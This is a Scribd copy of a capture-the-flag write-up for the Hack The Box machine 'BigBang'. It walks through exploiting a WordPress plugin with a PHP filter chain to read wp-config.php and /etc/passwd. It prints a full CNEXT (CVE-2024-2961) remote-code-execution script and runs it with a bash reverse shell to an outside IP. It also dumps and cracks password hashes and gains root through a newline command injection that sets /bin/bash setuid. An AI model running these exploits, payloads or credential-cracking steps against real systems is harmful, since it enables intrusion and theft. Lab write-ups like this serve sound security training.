Scribd
Upload
648 views29 pages

Big Bang

The document details a penetration testing process on a target server (10.129.206.242) using tools like Nmap and WPScan to identify open ports and vulnerabilities, specifically in a WordPress installation. It highlights the discovery of a vulnerable plugin (CVE-2024-2961) and demonstrates an exploitation technique to exfiltrate sensitive files such as wp-config.php and /etc/passwd. The document includes code snippets for crafting and sending payloads to exploit the identified vulnerabilities.

Uploaded by

https://apedesigns.fun/
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
648 views29 pages

Big Bang

The document details a penetration testing process on a target server (10.129.206.242) using tools like Nmap and WPScan to identify open ports and vulnerabilities, specifically in a WordPress installation. It highlights the discovery of a vulnerable plugin (CVE-2024-2961) and demonstrates an exploitation technique to exfiltrate sensitive files such as wp-config.php and /etc/passwd. The document includes code snippets for crafting and sending payloads to exploit the identified vulnerabilities.

Uploaded by

https://apedesigns.fun/
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 29

BigBang

BigBang
Port Scan
┌──(kali㉿kali)-[~/HTB/BigBang]
└─$ nmap -sV -A -T4 -p- 10.129.206.242 -o port_scan
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-25 14:21 EST
Nmap scan report for 10.129.206.242
Host is up (0.078s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux;
protocol 2.0)
| ssh-hostkey:
| 256 d4:15:77:1e:82:2b:2f:f1:cc:96:c6:28:c1:86:6b:3f (ECDSA)
|_ 256 6c:42:60:7b:ba:ba:67:24:0f:0c:ac:5d:be:92:0c:66 (ED25519)
80/tcp open http Apache httpd 2.4.62
|_http-title: Did not follow redirect to http://blog.bigbang.htb/
|_http-server-header: Apache/2.4.62 (Debian)
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.14
Network Distance: 2 hops
Service Info: Host: blog.bigbang.htb; OS: Linux; CPE:
cpe:/o:linux:linux_kernel

TRACEROUTE (using port 5900/tcp)


HOP RTT ADDRESS
1 133.38 ms 10.10.16.1
2 46.17 ms 10.129.206.242

OS and Service detection performed. Please report any incorrect results at


https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.13 seconds

FootHold
On port 80:

1 / 29
BigBang

Start with some fuzzing:

┌──(kali㉿kali)-[~/HTB/BigBang]
└─$ ffuf -c -u "http://blog.bigbang.htb/FUZZ" -w
/usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-
lowercase-2.3-medium.txt

Wordpress CMS identified, the version seems to be 6.5.4:

2 / 29
BigBang

Run wpscan to identifies eventual wordpress realted vulnerabilities:

┌──(kali㉿kali)-[~/HTB/BigBang]
└─$ wpscan --url http://blog.bigbang.htb

3 / 29
BigBang

This buddyform version seems vulnearble to CVE-2024-2961 , we need to combine this with
this Medium so set url filed with php filter chain:

curl 'http://blog.bigbang.htb/wp-admin/admin-ajax.php' -d
'action=upload_image_from_url&url=php://filter/convert.base64-
encode|convert.iconv.855.UTF7|convert.iconv.CSGB2312.UTF-
32|convert.iconv.IBM-
1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-
32LE|convert.base64-decode|convert.base64-
encode|convert.iconv.855.UTF7|convert.iconv.CP-
AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-
32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-
encode|convert.iconv.855.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM11
33.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-
decode|convert.base64-
encode|convert.iconv.855.UTF7|convert.iconv.CSA_T500.UTF-
32|convert.iconv.CP857.ISO-2022-JP-
3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-
encode|convert.iconv.855.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.
ISO-IR-90|convert.base64-decode|convert.base64-
encode|convert.iconv.855.UTF7|convert.iconv.CP-
AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-
32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-
encode|convert.iconv.855.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.
CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64
-decode|convert.base64-
encode|convert.iconv.855.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-
U.IBM-932|convert.iconv.SJIS.EUCJP-
WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-
encode|convert.iconv.855.UTF7|convert.base64-decode/resource=../wp-
config.php&id=1&accepted_files=image/gif' -vv

4 / 29
BigBang

Now by requesting the uploaded image we are able to exfiltrate wp-config.php:

And also /etc/passwd:

5 / 29
BigBang

Ambionics gave us: CVE-2024-2961 but it needs to me modified for this specific case:

from __future__ import annotations


import base64
import urllib.parse
import zlib
import urllib
from dataclasses import dataclass
from requests.exceptions import ConnectionError, ChunkedEncodingError
from pwn import *
from ten import *
HEAP_SIZE = 2 * 1024 * 1024
BUG = "劄".encode("utf-8")

class Remote:
"""A helper class to send the payload and download files.
The logic of the exploit is always the same, but the exploit needs to
know how
download files (/proc/self/maps and libc) and how to send the payload.
The code here serves as an example that attacks a page that looks like:
```php
6 / 29
BigBang

<?php
$data = file_get_contents($_POST['file']);
echo "File contents: $data";
```
Tweak it to fit your target, and start the exploit.
"""

def __init__(self, url: str) -> None:


self.url = url
self.session = Session()

def send(self, path: str) -> Response:


"""Sends given `path` to the HTTP server. Returns the response.
"""
data = {'action' : 'upload_image_from_url',
'url' :
urllib.parse.quote_plus('php://filter/convert.base64-
encode|convert.iconv.855.UTF7|convert.iconv.CSGB2312.UTF-
32|convert.iconv.IBM-
1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-
32LE|convert.base64-decode|convert.base64-
encode|convert.iconv.855.UTF7|convert.iconv.CP-
AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-
32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-
encode|convert.iconv.855.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM11
33.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-
decode|convert.base64-
encode|convert.iconv.855.UTF7|convert.iconv.CSA_T500.UTF-
32|convert.iconv.CP857.ISO-2022-JP-
3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-
encode|convert.iconv.855.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.
ISO-IR-90|convert.base64-decode|convert.base64-
encode|convert.iconv.855.UTF7|convert.iconv.CP-
AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-
32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-
encode|convert.iconv.855.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.
CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64
-decode|convert.base64-
encode|convert.iconv.855.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-
U.IBM-932|convert.iconv.SJIS.EUCJP-
WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-
encode|convert.iconv.855.UTF7|convert.base64-decode/resource='+path),
'id' : '1',
'accepted_files' : 'image/gif'}
return self.session.post(self.url, data=data)

def send_exploit(self, payload: bytes) -> Response:


"""Sends the payload to the server.
"""
7 / 29
BigBang

data = {'action' : 'upload_image_from_url',


'url' : urllib.parse.quote_plus(payload),
'id' : '1',
'accepted_files' : 'image/gif'}
return self.session.post(self.url, data=data)

def download(self, path: str) -> bytes:


"""Returns the contents of a remote file.
"""
path = f"php://filter/convert.base64-encode/resource={path}"
file_path = self.send(path).json()['response']

if 'File type' in file_path:


print(file_path)
return b''

response = self.session.get(file_path)
data = response.content[6:]
return data

def data_decode(self, data:bytes)->bytes:


data = data.decode('latin-1')
return base64.decode(data + (4 - len(data) % 4) * '=')

@entry
@arg("url", "Target URL")
@arg("command", "Command to run on the system; limited to 0x140 bytes")
@arg("sleep", "Time to sleep to assert that the exploit worked. By default,
1.")
@arg("heap", "Address of the main zend_mm_heap structure.")
@arg(
"pad",
"Number of 0x100 chunks to pad with. If the website makes a lot of heap
"
"operations with this size, increase this. Defaults to 20.",
)
@dataclass
class Exploit:
"""CNEXT exploit: RCE using a file read primitive in PHP."""

url: str
command: str
sleep: int = 1
heap: str = None
pad: int = 20

def __post_init__(self):
self.remote = Remote(self.url)
self.log = logger("EXPLOIT")
self.info = {}
8 / 29
BigBang

self.heap = self.heap and int(self.heap, 16)

def check_vulnerable(self) -> None:


"""Checks whether the target is reachable and properly allows for
the various
wrappers and filters that the exploit needs.
"""

def safe_download(path: str) -> bytes:


try:
return self.remote.download(path)
except ConnectionError:
failure("Target not [b]reachable[/] ?")

def check_token(text: str, path: str) -> bool:


result = safe_download(path)

return len(set(result).intersection(set(text.encode()))) > 0

text = tf.random.string(50).encode()
base64 = b64(b'GIF89a' + text, misalign=True).decode()
path = f"data:text/plain;base64,{base64}"

result = safe_download(path)

if len(set(result).intersection(set(text))) == 0:
msg_failure("Remote.download did not return the test string")
print("--------------------")
print(f"Expected test string: {text}")
print(f"Got: {result}")
print("--------------------")
failure("If your code works fine, it means that the
[i]data://[/] wrapper does not work")

msg_info("The [i]data://[/] wrapper works")

text = 'GIF89a' + tf.random.string(50)


base64 = b64(text.encode(), misalign=True).decode()
path = f"php://filter//resource=data:text/plain;base64,{base64}"
if not check_token(text, path):
failure("The [i]php://filter/[/] wrapper does not work")

msg_info("The [i]php://filter/[/] wrapper works")

text = 'GIF89a' + tf.random.string(50)


base64 = b64(compress(text.encode()), misalign=True).decode()
path = f"php://filter/zlib.inflate/resource=data:text/plain;base64,
{base64}"

9 / 29
BigBang

if not check_token(text, path):


failure("The [i]zlib[/] extension is not enabled")

msg_info("The [i]zlib[/] extension is enabled")

msg_success("Exploit preconditions are satisfied")

def get_file(self, path: str) -> bytes:


with msg_status(f"Downloading [i]{path}[/]..."):
return self.remote.download(path)

def get_regions(self) -> list[Region]:


"""Obtains the memory regions of the PHP process by querying
/proc/self/maps."""
maps = self.remote.data_decode(self.get_file("/proc/self/maps"))

PATTERN = re.compile(
r"^([a-f0-9]+)-([a-f0-9]+)\b" r".*" r"\s([-rwx]{3}[ps])\s" r"
(.*)"
)
regions = []
for region in table.split(maps, strip=True):
if match := PATTERN.match(region):
start = int(match.group(1), 16)
stop = int(match.group(2), 16)
permissions = match.group(3)
path = match.group(4)
if "/" in path or "[" in path:
path = path.rsplit(" ", 1)[-1]
else:
path = ""
current = Region(start, stop, permissions, path)
regions.append(current)
else:
failure("Unable to parse memory mappings")

self.log.info(f"Got {len(regions)} memory regions")

return regions

def get_symbols_and_addresses(self) -> None:


"""Obtains useful symbols and addresses from the file read
primitive."""
regions = self.get_regions()

LIBC_FILE = "./libc.so.6"

# PHP's heap

self.info["heap"] = self.heap or self.find_main_heap(regions)


10 / 29
BigBang

print(f'HEAP address: {hex(self.info["heap"])}')

# Libc

libc = self._get_region(regions, "libc-", "libc.so")

#self.download_file(libc.path, LIBC_FILE)

self.info["libc"] = ELF(LIBC_FILE, checksec=False)


print(f'LIBC address: {hex(libc.start)}')
self.info["libc"].address = libc.start

def _get_region(self, regions: list[Region], *names: str) -> Region:


"""Returns the first region whose name matches one of the given
names."""
for region in regions:
if any(name in region.path for name in names):
break
else:
failure("Unable to locate region")

return region

def download_file(self, remote_path: str, local_path: str) -> None:


"""Downloads `remote_path` to `local_path`"""
data = self.remote.data_decode(self.get_file(remote_path))
Path(local_path).write(data)

def find_main_heap(self, regions: list[Region]) -> Region:


# Any anonymous RW region with a size superior to the base heap size
is a
# candidate. The heap is at the bottom of the region.
heaps = [
region.stop - HEAP_SIZE + 0x40
for region in reversed(regions)
if region.permissions == "rw-p"
and region.size >= HEAP_SIZE
and region.stop & (HEAP_SIZE-1) == 0
and region.path in ("", "[anon:zend_alloc]")
]

if not heaps:
failure("Unable to find PHP's main heap in memory")

first = heaps[0]

if len(heaps) > 1:
heaps = ", ".join(map(hex, heaps))
msg_info(f"Potential heaps: [i]{heaps}[/] (using last one)")
else:
11 / 29
BigBang

msg_info(f"Using [i]{hex(first)}[/] as heap")

return first

def run(self) -> None:


#self.check_vulnerable()
self.get_symbols_and_addresses()
self.exploit()

def build_exploit_path(self) -> str:


"""On each step of the exploit, a filter will process each chunk one
after the
other. Processing generally involves making some kind of operation
either
on the chunk or in a destination chunk of the same size. Each
operation is
applied on every single chunk; you cannot make PHP apply iconv on
the first 10
chunks and leave the rest in place. That's where the difficulties
come from.

Keep in mind that we know the address of the main heap, and the
libraries.
ASLR/PIE do not matter here.

The idea is to use the bug to make the freelist for chunks of size
0x100 point
lower. For instance, we have the following free list:

... -> 0x7fffAABBCC900 -> 0x7fffAABBCCA00 -> 0x7fffAABBCCB00

By triggering the bug from chunk ..900, we get:

... -> 0x7fffAABBCCA00 -> 0x7fffAABBCCB48 -> ???

That's step 3.

Now, in order to control the free list, and make it point whereever
we want,
we need to have previously put a pointer at address 0x7fffAABBCCB48.
To do so,
we'd have to have allocated 0x7fffAABBCCB00 and set our pointer at
offset 0x48.
That's step 2.

Now, if we were to perform step2 an then step3 without anything


else, we'd have
a problem: after step2 has been processed, the free list goes
bottom-up, like:

12 / 29
BigBang

0x7fffAABBCCB00 -> 0x7fffAABBCCA00 -> 0x7fffAABBCC900

We need to go the other way around. That's why we have step 1: it


just allocates
chunks. When they get freed, they reverse the free list. Now step2
allocates in
reverse order, and therefore after step2, chunks are in the correct
order.

Another problem comes up.

To trigger the overflow in step3, we convert from UTF-8 to ISO-2022-


CN-EXT.
Since step2 creates chunks that contain pointers and pointers are
generally not
UTF-8, we cannot afford to have that conversion happen on the chunks
of step2.
To avoid this, we put the chunks in step2 at the very end of the
chain, and
prefix them with `0\n`. When dechunked (right before the iconv),
they will
"disappear" from the chain, preserving them from the character set
conversion
and saving us from an unwanted processing error that would stop the
processing
chain.

After step3 we have a corrupted freelist with an arbitrary pointer


into it. We
don't know the precise layout of the heap, but we know that at the
top of the
heap resides a zend_mm_heap structure. We overwrite this structure
in two ways.
Its free_slot[] array contains a pointer to each free list. By
overwriting it,
we can make PHP allocate chunks whereever we want. In addition, its
custom_heap
field contains pointers to hook functions for emalloc, efree, and
erealloc
(similarly to malloc_hook, free_hook, etc. in the libc). We
overwrite them and
then overwrite the use_custom_heap flag to make PHP use these
function pointers
instead. We can now do our favorite CTF technique and get a call to
system(<chunk>).
We make sure that the "system" command kills the current process to
avoid other
system() calls with random chunk data, leading to undefined
behaviour.

13 / 29
BigBang

The pad blocks just "pad" our allocations so that even if the heap
of the
process is in a random state, we still get contiguous, in order
chunks for our
exploit.

Therefore, the whole process described here CANNOT crash. Everything


falls
perfectly in place, and nothing can get in the middle of our
allocations.
"""

LIBC = self.info["libc"]
ADDR_EMALLOC = LIBC.symbols["__libc_malloc"]
ADDR_EFREE = LIBC.symbols["__libc_system"]
ADDR_EREALLOC = LIBC.symbols["__libc_realloc"]

ADDR_HEAP = self.info["heap"]
ADDR_FREE_SLOT = ADDR_HEAP + 0x20
ADDR_CUSTOM_HEAP = ADDR_HEAP + 0x0168

ADDR_FAKE_BIN = ADDR_FREE_SLOT - 0x10

CS = 0x100

# Pad needs to stay at size 0x100 at every step


pad_size = CS - 0x18
pad = b"\x00" * pad_size
pad = chunked_chunk(pad, len(pad) + 6)
pad = chunked_chunk(pad, len(pad) + 6)
pad = chunked_chunk(pad, len(pad) + 6)
pad = compressed_bucket(pad)

step1_size = 1
step1 = b"\x00" * step1_size
step1 = chunked_chunk(step1)
step1 = chunked_chunk(step1)
step1 = chunked_chunk(step1, CS)
step1 = compressed_bucket(step1)

# Since these chunks contain non-UTF-8 chars, we cannot let it get


converted to
# ISO-2022-CN-EXT. We add a `0\n` that makes the 4th and last
dechunk "crash"

step2_size = 0x48
step2 = b"\x00" * (step2_size + 8)
step2 = chunked_chunk(step2, CS)
step2 = chunked_chunk(step2)
step2 = compressed_bucket(step2)
14 / 29
BigBang

step2_write_ptr = b"0\n".ljust(step2_size, b"\x00") +


p64(ADDR_FAKE_BIN)
step2_write_ptr = chunked_chunk(step2_write_ptr, CS)
step2_write_ptr = chunked_chunk(step2_write_ptr)
step2_write_ptr = compressed_bucket(step2_write_ptr)

step3_size = CS

step3 = b"\x00" * step3_size


assert len(step3) == CS
step3 = chunked_chunk(step3)
step3 = chunked_chunk(step3)
step3 = chunked_chunk(step3)
step3 = compressed_bucket(step3)

step3_overflow = b"\x00" * (step3_size - len(BUG)) + BUG


assert len(step3_overflow) == CS
step3_overflow = chunked_chunk(step3_overflow)
step3_overflow = chunked_chunk(step3_overflow)
step3_overflow = chunked_chunk(step3_overflow)
step3_overflow = compressed_bucket(step3_overflow)

step4_size = CS
step4 = b"=00" + b"\x00" * (step4_size - 1)
step4 = chunked_chunk(step4)
step4 = chunked_chunk(step4)
step4 = chunked_chunk(step4)
step4 = compressed_bucket(step4)

# This chunk will eventually overwrite mm_heap->free_slot


# it is actually allocated 0x10 bytes BEFORE it, thus the two filler
values
step4_pwn = ptr_bucket(
0x200000,
0,
# free_slot
0,
0,
ADDR_CUSTOM_HEAP, # 0x18
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
15 / 29
BigBang

0,
0,
0,
ADDR_HEAP, # 0x140
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
size=CS,
)

step4_custom_heap = ptr_bucket(
ADDR_EMALLOC, ADDR_EFREE, ADDR_EREALLOC, size=0x18
)

step4_use_custom_heap_size = 0x140

COMMAND = self.command
COMMAND = f"kill -9 $PPID; {COMMAND}"
if self.sleep:
COMMAND = f"sleep {self.sleep}; {COMMAND}"
COMMAND = COMMAND.encode() + b"\x00"

assert (
len(COMMAND) <= step4_use_custom_heap_size
), f"Command too big ({len(COMMAND)}), it must be strictly inferior
to {hex(step4_use_custom_heap_size)}"
COMMAND = COMMAND.ljust(step4_use_custom_heap_size, b"\x00")

step4_use_custom_heap = COMMAND
step4_use_custom_heap = qpe(step4_use_custom_heap)
step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
step4_use_custom_heap = compressed_bucket(step4_use_custom_heap)

pages = (
step4 * 3
+ step4_pwn
+ step4_custom_heap
+ step4_use_custom_heap
16 / 29
BigBang

+ step3_overflow
+ pad * self.pad
+ step1 * 3
+ step2_write_ptr
+ step2 * 2
)

resource = compress(compress(pages))
resource = b64(resource) #b64(pages)
resource = f"data:text/plain;base64,{resource.decode()}"

filters = [
# Create buckets
"zlib.inflate",
"zlib.inflate",

# Step 0: Setup heap


"dechunk",
"convert.iconv.L1.L1",

# Step 1: Reverse FL order


"dechunk",
"convert.iconv.L1.L1",

# Step 2: Put fake pointer and make FL order back to normal


"dechunk",
"convert.iconv.L1.L1",

# Step 3: Trigger overflow


"dechunk",
"convert.iconv.UTF-8.ISO-2022-CN-EXT",

# Step 4: Allocate at arbitrary address and change zend_mm_heap


"convert.quoted-printable-decode",
"convert.iconv.L1.L1",
]
filters = "|".join(filters)
path = f"php://filter/read={filters}/resource={resource}"

return path

@inform("Triggering...")
def exploit(self) -> None:
path = self.build_exploit_path()
start = time.time()

try:
msg_print("Sending exploit...")
print(f'PATH: {path}')

17 / 29
BigBang

self.remote.send_exploit(path)
except (ConnectionError, ChunkedEncodingError):
pass

msg_print()

if not self.sleep:
msg_print(" [b white on black] EXPLOIT [/][b white on green]
SUCCESS [/] [i](probably)[/]")
elif start + self.sleep <= time.time():
msg_print(" [b white on black] EXPLOIT [/][b white on green]
SUCCESS [/]")
else:
# Wrong heap, maybe? If the exploited suggested others, use
them!
msg_print(" [b white on black] EXPLOIT [/][b white on red]
FAILURE [/]")

msg_print()

def compress(data) -> bytes:


"""Returns data suitable for `zlib.inflate`.
"""
# Remove 2-byte header and 4-byte checksum
return zlib.compress(data, 9)[2:-4]

def b64(data: bytes, misalign=True) -> bytes:


payload = base64.encode(data)
if not misalign and payload.endswith("="):
raise ValueError(f"Misaligned: {data}")
return payload.encode()

def compressed_bucket(data: bytes) -> bytes:


"""Returns a chunk of size 0x8000 that, when dechunked, returns the
data."""
return chunked_chunk(data, 0x8000)

def qpe(data: bytes) -> bytes:


"""Emulates quoted-printable-encode.
"""
return "".join(f"={x:02x}" for x in data).upper().encode()

def ptr_bucket(*ptrs, size=None) -> bytes:


"""Creates a 0x8000 chunk that reveals pointers after every step has
been ran."""
18 / 29
BigBang

if size is not None:


assert len(ptrs) * 8 == size
bucket = b"".join(map(p64, ptrs))
bucket = qpe(bucket)
bucket = chunked_chunk(bucket)
bucket = chunked_chunk(bucket)
bucket = chunked_chunk(bucket)
bucket = compressed_bucket(bucket)

return bucket

def chunked_chunk(data: bytes, size: int = None) -> bytes:


"""Constructs a chunked representation of the given chunk. If size is
given, the
chunked representation has size `size`.
For instance, `ABCD` with size 10 becomes: `0004\nABCD\n`.
"""
# The caller does not care about the size: let's just add 8, which is
more than
# enough
if size is None:
size = len(data) + 8
keep = len(data) + len(b"\n\n")
size = f"{len(data):x}".rjust(size - keep, "0")
return size.encode() + b"\n" + data + b"\n"
@dataclass
class Region:
"""A memory region."""

start: int
stop: int
permissions: str
path: str

@property
def size(self) -> int:
return self.stop - self.start
Exploit()

To run this exploit you need libc.so.6 :

┌──(cnext-exploits-i69-TIyW)─(kali㉿kali)-[~/HTB/BigBang]
└─$ python3 rce.py http://blog.bigbang.htb/wp-admin/admin-ajax.php 'bash -c
"bash -i >& /dev/tcp/10.10.16.65/9092 0>&1"'

19 / 29
BigBang

On listening netcat:

By hostame -I seems we are in a docker container:

20 / 29
BigBang

The DB relies on 172.17.0.1, we can query it trough the following php script:

echo "<?php
\$host = '172.17.0.1';
\$username = 'wp_user';
\$password = 'wp_password';
\$database = 'wordpress';

\$mysqli = new mysqli(\$host, \$username, \$password, \$database);

if (\$mysqli->connect_error) {
die('Connection failed: ' . \$mysqli->connect_error);
}

\$query = 'SELECT * FROM wp_users';


\$result = \$mysqli->query(\$query);

if (\$result && \$result->num_rows > 0) {


while (\$row = \$result->fetch_assoc()) {
echo 'ID: ' . \$row['ID'] . \"\\n\";
echo 'Username: ' . \$row['user_login'] . \"\\n\";
echo 'Email: ' . \$row['user_email'] . \"\\n\";
21 / 29
BigBang

echo 'Display Name: ' . \$row['display_name'] . \"\\n\";


echo 'Password Hash: ' . \$row['user_pass'] . \"\\n\";
echo \"-----------------------------------\\n\";
}
} else {
echo 'No users found or query failed.' . \"\\n\";
}

\$mysqli->close();
?>" > test2.php

Then run the script php test2.php:

We extracted wordpress uresers table:

ID: 1
Username: root
Email: [email protected]
Display Name: root
Password Hash: $P$Beh5HLRUlTi1LpLEAstRyXaaBOJICj1
-----------------------------------
ID: 3
Username: shawking
Email: [email protected]
Display Name: Stephen Hawking
Password Hash: $P$Br7LUHG9NjNk6/QSYm2chNHfxWdoK./

22 / 29
BigBang

Then crack shawking hash with john:

shawking:quantumphysics

userflag:a2cef0ebeae72476ef0d340da225b249

Privilege Escalation

23 / 29
BigBang

Forward port 9090 and 3000, on the second one we have grafana:

Copy /etc/grafana/grafana.db:

24 / 29
BigBang

Convert this hashes in suitable format for hashcat using grafana2hashcat, craft an
hashes.txt file:

┌──(kali㉿kali)-[~/HTB/BigBang/grafana2hashcat]
└─$ cat hashes.txt
441a715bd788e928170be7954b17cb19de835a2dedfdece8c65327cb1d9ba6bd47d70edb7421
b05d9706ba6147cb71973a34,CFn7zMsQpf
7e8018a4210efbaeb12f0115580a476fe8f98a4f9bada2720e652654860c59db93577b12201c
0151256375d6f883f1b8d960,4umebBJucv

Then run hashcat to crack:

┌──(kali㉿kali)-[~/HTB/BigBang/grafana2hashcat]
└─$ hashcat -m 10900 hashcat_hashes.txt --wordlist
/usr/share/wordlists/rockyou.txt

25 / 29
BigBang

sha256:10000:NHVtZWJCSnVjdg==:foAYpCEO+66xLwEVWApHb+j5ik+braJyDmUmVIYMWduTV3
sSIBwBUSVjddb4g/G42WA=:bigbang

Try this password for developer in SSH:

Copy satellite-app.apk from android folder:

26 / 29
BigBang

We have forwarded also port 9090, which seems to have /command and /login:

Both only accepts posts request, and command requires an authentication token, so try to
use login with developer credentials:

┌──(kali㉿kali)-[~/HTB/BigBang]
└─$ curl -X POST http://localhost:9090/login -H "Content-type:
application/json" -d "{\"username\":\"developer\",
\"password\":\"bigbang\"}"
--------------------------------------------------------------
{"access_token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsIm

27 / 29
BigBang

lhdCI6MTczODA2MTM1MywianRpIjoiMTI3MTRmYmItOTFkMS00ODFjLWFhMDgtMzMwYWEyYWJmMW
M0IiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImRldmVsb3BlciIsIm5iZiI6MTczODA2MTM1MywiY3
NyZiI6ImFiZjY0NmZjLThkMmQtNDkzZC04NGVkLWRjMzZkZTM2ODZmNCIsImV4cCI6MTczODA2ND
k1M30.9KALi-5Exe6W0u-FBhVsy-if1Mfm3YW-m1Yn3z7ETk8"}

Now by JADX:

We are able to perform command injection with output_file field:

┌──(kali㉿kali)-[~/HTB/BigBang]
└─$ curl -X POST http://localhost:9090/command -H "Content-type:
application/json" -H "Authorization: Bearer
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTczODA2MTM
1MywianRpIjoiMTI3MTRmYmItOTFkMS00ODFjLWFhMDgtMzMwYWEyYWJmMWM0IiwidHlwZSI6ImF
jY2VzcyIsInN1YiI6ImRldmVsb3BlciIsIm5iZiI6MTczODA2MTM1MywiY3NyZiI6ImFiZjY0NmZ
jLThkMmQtNDkzZC04NGVkLWRjMzZkZTM2ODZmNCIsImV4cCI6MTczODA2NDk1M30.9KALi-
5Exe6W0u-FBhVsy-if1Mfm3YW-m1Yn3z7ETk8" --data '{"command":"send_image",
"output_file":"\nchmod 4777 /bin/bash"}'

On developer's SSH:

28 / 29
BigBang

rootflag:e94d1652eadb3ec9279ee55a19c8f218

29 / 29

You might also like